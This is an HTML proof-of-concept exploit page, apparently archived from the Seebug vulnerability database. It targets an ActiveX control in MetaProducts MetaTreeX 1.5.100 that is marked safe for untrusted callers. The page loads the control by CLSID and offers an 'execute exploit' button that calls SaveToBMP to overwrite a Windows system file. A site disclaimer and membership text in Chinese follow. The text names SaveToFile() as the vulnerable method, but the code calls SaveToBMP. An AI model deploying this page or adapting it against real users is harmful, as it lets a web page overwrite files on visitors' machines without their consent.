<HTML> <BODY> <b> Author : Houssamix <br/> <br/> <br/> MetaProducts MetaTreeX V 1.5.100 Remote File Overwrite Exploit <br/> Note : SaveToFile() is vuln to <br/> <b/> <object id=hsmx classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object> <SCRIPT> /* Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26} RegKey Safe for Script: Faux RegKey Safe for Init: Faux Implements IObjectSafety: Vrai IDisp Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data */ function hehe() { File = "c:\\windows\\system_.ini" hsmx.SaveToBMP(File) } </SCRIPT> <input language=JavaScript onclick=hehe() type=button value="execute exploit"><br> </body> </HTML> # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论